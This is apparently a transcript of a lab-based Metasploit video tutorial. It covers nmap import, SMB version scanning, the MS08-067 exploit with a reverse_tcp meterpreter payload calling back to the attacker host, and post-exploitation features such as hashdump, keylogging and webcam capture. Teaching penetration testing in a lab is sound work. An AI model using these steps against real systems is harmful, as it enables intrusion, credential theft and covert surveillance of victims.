global parameter. show always displays modules of a given type, or all modules, and we're going to get into that as well. Also you have a couple of things down here with db_export, to export like a report type of deal, which as I discussed is kind of cumbersome, because there's no XSL file for it to be converted to an HTML document, so that's something I'm working on writing, like I said. db_nmap is the built-in nmap scanning module for that, and then you have db_import, which imports your scan results file from any other scanners, specifically nmap. So in order to do the import we have to first check to make sure that there's nothing in our database. If you notice, in Armitage the first thing we did was clear our database out, because we don't want to get that confused with something else that we might have been scanning before, so on and so forth. So in order to do that you just have to type in hosts and hit Enter. Now as you can see here, I already have some stuff in here from doing some demonstrations a little while ago. If you have stuff in there you want to clear, it's just hosts -d for delete. You can delete individual hosts by just typing in its IP address, so for instance if we just want to delete the 1.2, we just type in hosts -d 192.168.1.2 and hit Enter, and it says it deleted one host down here at the bottom, and it tells you the host it deleted. And then if you issued the hosts command again we would see we only have two in here now. I want to delete the whole database, because I want to start fresh, right? So it's hosts -d for delete all, and it deletes two hosts, the two hosts that were left over. Again, if we type in hosts we can make sure that our database is actually clear, OK? Let me clear the screen out here. So we talked about learning how to use setg. Now setg sets global parameters for you to use, so if you're working against one specific target IP, or if you're doing an internal audit and you're working towards an entire subnet range, or, you know, something like that, you can
always use the setg parameter. We'll get to that here in just a minute. First we want to do is the db_import, because we want to import our nmap scan that we did before, right? So it's db_import and the path to where the file actually resides, so that's /root, and then that's AcmeInc, and then that was fresh_scan.xml. So just hit Enter after that and you can see that it's importing all of our hosts for us here. Now again, we're going to have to go through and remove some of these hosts, to save a little bit of time, because I know a couple of them are, you know, like 1.1 is a router again, and 1.3 is this machine that we're working off of here, OK? So let's clear this out. Now let's go ahead and issue the hosts command again. You can see now that it's imported all of our hosts; however, as I said, it's not reading correctly on the operating system, and as before, we know 1.9 is actually a Windows 2003 box, so it didn't really import it correctly in terms of the OS name or any kind of service packs or things like that. All right, so first things first, I'm going to remove the hosts that we're not going to scan, so I'm just going to hosts -d 192.168.1.1, and I'm going to do the same thing for .3, and then I'm just going to issue the hosts command again. All right, so now we have our three target machines in here. So the thing is that you want to do what we did in Armitage and use the MSF Scans to better enumerate the operating systems and the service packs available to them. So those are actually located in the directory structure, and I'm going to put a link in the description to learn everything there is to learn about msfconsole, so you guys have a guide or a reference to go to if you get a little confused, OK? So, um, auxiliary holds, as we've seen in Armitage, the directory tree structure: auxiliary holds some of your scanners, fuzzers, you know, DoS attackers, you know, brute-forcers, things like that. The scanner that we want to use, in terms of what the MSF Scans was all about, is
actually called smb_version, because we want to find out what version these operating systems are, actually, the true versions of the operating systems. So anytime that you want to find an actual scanner, exploit, vulnerability, payload, whatever that you're looking for, and you know the name of it, you can use the locate command. So that's locate, and then I'm looking for specifically smb_version, and now you can see it tells me that it's in auxiliary/scanner/smb/smb_version. That's the scanner that I want to use. But what if I didn't know the name of the actual scanner that I was looking to use, right? So I could do show auxiliary, and it's going to show me everything in the auxiliary directory tree structure, and it may take a minute, or maybe a little less, depending on how fast your system is, because it is literally querying and doing like a directory command on everything that is in the auxiliary folder. Now you can see here it scrolls back everything that's under auxiliary, OK? So we want to look for SMB, because we know that we're looking to do some Windows stuff, and if we look here we only have a few options for SMB scanners. Starting at the very top here, smb pipe_auditor, things like that, well, smb psexec, OK, smb... and we are looking for smb_version. So right here it's under auxiliary as the top directory, then it's in scanner/smb/smb_version, OK? So let's just clear out the screen here. All right, so first we want to use that actual tool, so the command is simple: use auxiliary/scanner, oops, /smb, and then /smb_version, OK? And you can always use Tab as autocomplete. You can also arrow up, arrow down if you want to, you know, go through your commands that you've already issued and just do it again. So I'm going to hit Enter. Now you can see that the screen has changed a little bit here, and the smb_version is now highlighted in red, so that's actually what we're actually in right now. So we want to know what options are available to us in this script that we're using, so
simply type in show options and it will tell you all the options. Now, RHOSTS, SMBDomain, WORKGROUP, SMBPass, SMBUser, THREADS, so on and so forth. We can change all that. We want to type in RHOSTS; now we're going to type in a range, right, so we want to go from .2 to .9. So it's simply, to set an option, it's set and then the option, RHOSTS, and you can use autocomplete on that just to make sure you're getting the right syntax, OK, and then it's 192.168.1.2-9. Now you don't have to type in the dot before the 9, keep that in mind, and hit Enter. Now if you did show options again you should see that it reflected, and here it is, OK, so our changes have been made. And now simply we want to run the scanner, so what's the command? run, very simple, right? Now you can see it's going through and it's going to do a determination on the operating system and the service pack available to it. Now it's not always 110 percent accurate, but it's pretty damn close most of the time, and you can see it's going to take a little while depending on the IP address range you're scanning, you know, your internet speed, your computer speed, all those things, again, guys, factor into any of the scans that we ever do, so keep that in mind if things are going a little bit slow. OK, so it's at "Scanned 8 of 8 hosts (100% complete), auxiliary module execution completed." Fantastic. So now if we issue the hosts command again, now we have a little bit more accurate depiction of what our machines actually look like. So now 1.9, instead of reporting as Windows XP, guess what, it's Windows Server 2003 Service Pack 0, right? So I know 1.3 is my box here, so again I just want to remove that with hosts -d and then 192.168.1.3, OK? Clear the screen again, type in hosts, OK, so now we know what we're working with here, right? So let's get back to our setg command, because now we know that we're up against a Windows 2003 server and we want to target that first and foremost, because, hey, that's the meat and potatoes of everything, right? If
you get access to that system, depending on what type of access or level of access we get, we can pretty much own the rest of the network, right? So that's going to be our target machine we want to go after first. All right, so now, if you think that, you know, a target network has high-level security, you probably want to go a little bit lower level; you would start with a workstation and try to work your way up to getting to the server, OK? But since this is our lab network, I know I just want to go after the Windows domain controller first and then try to own everything else after that. So anytime you want to get out of whatever module or scanner or whatever you're using, just type in back and it'll get you out of it. Well, let's clear this out again and let's go ahead and issue our hosts command so we know what we're up against. All right, so getting back to setg: the command to set those is simply setg, and then if you just hit Enter it's going to show you that there's no global entries in there right now. So we want to do setg RHOSTS and we want to set that to 192.168.1.9. After that, right, if we do setg again by itself, we can see that the RHOSTS is now set to 192.168.1.9. Beautiful thing. So clear this out again. Now we know already that ms08_067, that Windows 2003 server is actually vulnerable to that. Now if you weren't sure where an exploit actually lives or a payload actually lives, you can always do that locate command again. So if we did locate ms08_067, you can see that it's in exploits/windows/smb/ms08_067. So whenever we want to use something, the use command is always going to be used, and when you want to do a payload, you're going to set the payload to use when that exploit actually happens. So keep that in mind: use to use a scanner, payload, I'm sorry, use to use a scanner, an exploit, so on and so forth; set to set the payload that's going to be working with that exploit. So we want to set up our exploit first, so we use... use exploit/windows/smb, following
our path up here from our locate command, /ms08_067_netapi, and hit Enter. OK, so now you can see that you're in this actual exploit, so again, show options. OK, well now you can see that our RHOST is already filled in for us, right, because of the setg command, the global parameter that we put in. We don't want to change our port, but you can if you want to, and how you would do that is just simply set; to set an option you just type in set, not setg, and then you do RPORT, whatever it is, and then I'm just going to leave this the same, but just to show you how it works, 445. And now of course if you did show options again you can see that it's taken it, it's in there already. But generally speaking you leave the RPORT alone, because that's what the exploit is actually set up to work off of, so you don't really want to change that unless of course, you know, your client has changed that service to a different port; then of course you're going to want to have to do that. So anyway, now we have our exploit set up; that's the exploit we're going to use. So now we need to pick our payload. I love Windows meterpreter shells, I mean, they're just awesome, and they give you so much power and control over the system once you've compromised it that that's all I seem to tend to stick to. Now there is a meterpreter version for Linux. If you want to learn more about meterpreter you can go on a couple of different websites; I'll put one in the description as well, if you want to go on that, or of course you can always go to learnnetsec.com and check out our forums, ask us about it over there, OK? So now we want to use, or I'm sorry, we want to set the payload that we're going to use. So I want to locate my meterpreter, oops, payloads, and you can see it scrolls past a bunch, guys, right? So there's going to be scripts/meterpreter, meterpreter, meterpreter, then of course you're going to go up here, there's going to be modules/payloads/stages, there's a bunch of stuff in here, so you may want to take some time
getting familiar with the directory structure and where it's actually at, you know, what you want to use. But we want to use something for Windows, so we're going to look through this whole line of stuff here for something that would go into Windows. Well, pro version, that's only for the Pro, so here we can go data/meterpreter and so on and so forth, but I happen to know where that is already from, you know, just remembering it, pretty much. So I'm going to get out of here and I'm just going to clear the screen. So I want to set payload, OK, and then... so you're telling it to set the payload that you want to use, and then it's in windows, sometimes it takes a minute if you're doing autocomplete, so it's windows/meterpreter, and then it's reverse_tcp I want to use. Now there's a bunch of different options: you use reverse_tcp, you use reverse or bind_tcp, you can use reverse_dns, so on and so forth. I like reverse_tcp as my default, because it seems to work the best for me anyway, OK? So once I do that, I hit set and now it's set the Windows payload for that, OK? So once you do that and you do show options again, you're going to go ahead and find where the payload options are, so you want to set LHOST, for your local host, to the IP address of your Kali Linux machine, in this case it's 1.99. Now keep in mind, for LPORT, if you're using the default port 4444, if you're behind a NAT device like a router, something like that, you want to do the port forwarding. Of course, if you're doing something over the LAN, of course, if you're local, then you don't have to worry about that, or you could put your Kali Linux machine up on the DMZ and not have to worry about any of that. So I'm going to set my LHOST to 1.99. Now if I do show options again, you can see that everything is set for me: so I've set my exploit, and I've set the RHOST, which was set by setg, the global parameters, and now in payload options I did my reverse_tcp. Now again, you can use setg to set your LHOST as well if you wanted to, so a
simple setg LHOST 192.168.1.99, our attacking machine, OK, and then of course setg, you can now see that they're both set, OK? In any case, now we're ready to fire our script, but do we really want to fire it yet, or do we want to check to make sure that that host is actually vulnerable? So simply, if you want to check, just type in check and hit Enter, and here we go, it says "The target is vulnerable." Now this is much the same as you see the output in Armitage in the console window, so I know this target is vulnerable. I want to go ahead and fire it, so I just simply type in exploit -j, to background it, and go ahead and hit Enter. Once you see, as I said, "Sending stage," you know that you're almost guaranteed to be in. The next line you see is "Meterpreter session 1 opened" on our local computer here on port 4444, and then it's to the target machine on port 1739. Now you might be saying to yourself, "well, oh great, but it looks like the screen is frozen." It's not; just hit Enter and that's going to drop you back to your command line. Now it says that it opened a session, but how do we find out what sessions we have open? Simply type in the sessions command and hit Enter, and you can see that the session ID 1 is meterpreter and it is running as SYSTEM at 1.9, the target IP address of 1.9, OK? Well, now, great, we know we have it, but how do we interact with that, how do we get into the meterpreter shell? Very simple; there's no right-click menus here like there was in Armitage, so it's sessions -i, oops, -i for interact, and then the session ID, which is 1 in our case, OK? So now we're dropped into a meterpreter shell. Well, that's all well and good, but how do we know what to do here? There's no right-click menu. Well, simple: type in help and that will give you a list of all the commands that you can actually do and their top-level meaning, like Priv: Elevate commands, getsystem, which we know we're already SYSTEM so we don't have to worry about that, you've got hashdump to dump the
password hashes, you've got timestomp to manipulate the MACE attributes, you have a bunch of different stuff in here like getdesktop, you could start a keylogger in there, you can do screenshots. You know, like, for instance, if I want to do a screenshot right now, I just type in screenshot, hit Enter, and it tells you the screenshot was saved to /root/EDIGWT, whatever, it makes up some random name. So now if we went into our Computer and we went into File System and then we went into root, well, we can see that there's a .jpeg here, so open with Image Viewer. It may just take a second here, my system's lagging a little bit. OK, well there's a screenshot that it just took, so it's in its idle screen, so we know nobody's sitting in front of it right now, right? So that's pretty awesome. And then again, I mean, you know, you have a bunch of different commands here: you can record their microphone, their webcam, I mean, you can list webcams if there is one attached; I don't have one attached, as it's a virtual machine. But you could drop into a system shell, you can modify the remote registry, you can reboot the computer, you could kill a process, you can list the processes here with ps, you can getprivs, getpid. So if we want to do getpid, looks like the current PID is 920. If we did ps to list all the processes, you would look for 920 in there for the process ID, and here we are, right here, so we are under svchost.exe, and that's where we're at, OK? So you can issue the help command just to go through some more of the other parameters here: you can do an upload, upload a file, directory, you can remove directory, you know, you can basically cat some directories of a file, stuff like that. So I mean there's a whole lot of stuff you can do here; migrate process, it's pretty much everything you could do, and a little bit more, from Armitage, the way with the right-click menu and all that good stuff. Yeah, I mean there's a ton of stuff you could do in here, guys, but that's pretty much it for using
meterpreter if you want to get out of meterpreter and kill your session at the very same time you can always do exit right so those sessions are closed and if we type in sessions again you can see that there's no active sessions so let me just get out of here I want to go ahead and just do this quickly so you guys see how fast once you get used to see how fast it actually works so again I want to list my hosts I want to go after 1.9 I've done my set G parameters already so I know that that's good I want to use exploit windows SMB MSO 8 o 67 I want to show options and it looks like my options were set in there and of course I want to use my meterpreter shell so it's set payload windows Terp retur reverse TCP show options my L host is already set because I did to set G now I just want to do check vulnerable I want to exploit J there you go my sessions opened now let's say if you list your sessions and you just like alright good I got a shell on that box really didn't do anything else you can always do kill command in session so it's sessions tak Kay and then the session ID which is in our case two sessions closed sessions again no active sessions we're all done and we can back out of here and clear and we can exit MSF console and we are back to normal right so that's pretty much it guys for using MSF console in place of Armitage now Armitage might be easier for some beginners because it is GOI based it's kind of point-and-click and kill whereas some of our seasoned veteran guys might be more comfortable with MSF console and like I said I've noticed a few bugs inside of Armitage that you know like with PSE exec and pass the hash which didn't show as a compromised host meanwhile I did the same thing in MSF console the same exact way and sure enough it gave me a reverse meterpreter shell on that box so meanwhile while there wasn't any other active exploits as we've seen for like the Windows XP service pack 3 box in Armitage or the Windows Server 7 box in Armitage I was 
able to actually use pass the hash and PS exe PS exec and actually compromise those machines and open meterpreter sessions on those as well so that's pretty much it guys make sure to give us a thumbs up on a video if you liked it you learned something make sure to subscribe to our channel here also make sure to check out our website learn net set comm join the forums and hang out with us chat with us ask questions we're there to help and learn from each other follow us on Twitter check us out on Facebook all the links are in the description for everything we discussed here today and thanks for watching guys I'll see you in the next video take care
Info
Channel: NetSecNow
Views: 647,891
Keywords: Exploit, Computer, Virtual, How-to, Linux, Kali Linux, Metasploit, Armitage, nmap, zenmap, Tutorial, Hacking, Ethical, Hacker, Windows, Vulnerability, Lab, Proxmox, Proxmox VE, Configuration, Howto, Server, Proxmox Virtual Environment, Hacker (Character Power), Debian, Microsoft Windows (Operating System), Network, Security, Penetration Tester, PenTest, Metasploit Project (Software), msfconsole
Id: lZlqr2PFJIo
Length: 74min 8sec (4448 seconds)
Published: Sun Jul 28 2013